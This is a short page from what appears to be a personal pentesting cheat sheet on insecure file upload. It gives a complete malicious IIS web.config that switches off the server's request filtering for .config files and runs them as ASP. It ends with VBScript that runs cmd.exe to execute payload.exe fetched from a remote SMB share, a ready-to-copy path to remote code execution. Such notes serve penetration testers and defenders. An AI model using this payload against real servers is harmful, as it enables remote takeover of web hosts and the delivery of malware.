xct's notes
Search…
Insecure File Upload

RCE by uploading web.config

1
<?xml version="1.0" encoding="UTF-8"?>
2
<configuration>
3
<system.webServer>
4
<handlers accessPolicy="Read, Script, Write">
5
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
6
</handlers>
7
<security>
8
<requestFiltering>
9
<fileExtensions>
10
<remove fileExtension=".config" />
11
</fileExtensions>
12
<hiddenSegments>
13
<remove segment="web.config" />
14
</hiddenSegments>
15
</requestFiltering>
16
</security>
17
</system.webServer>
18
</configuration>
19
<%@ Language=VBScript %>
20
<%
21
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c \\ip\public\payload.exe")
22
%>
Copied!

Create Zip Slip Files

Last modified 1yr ago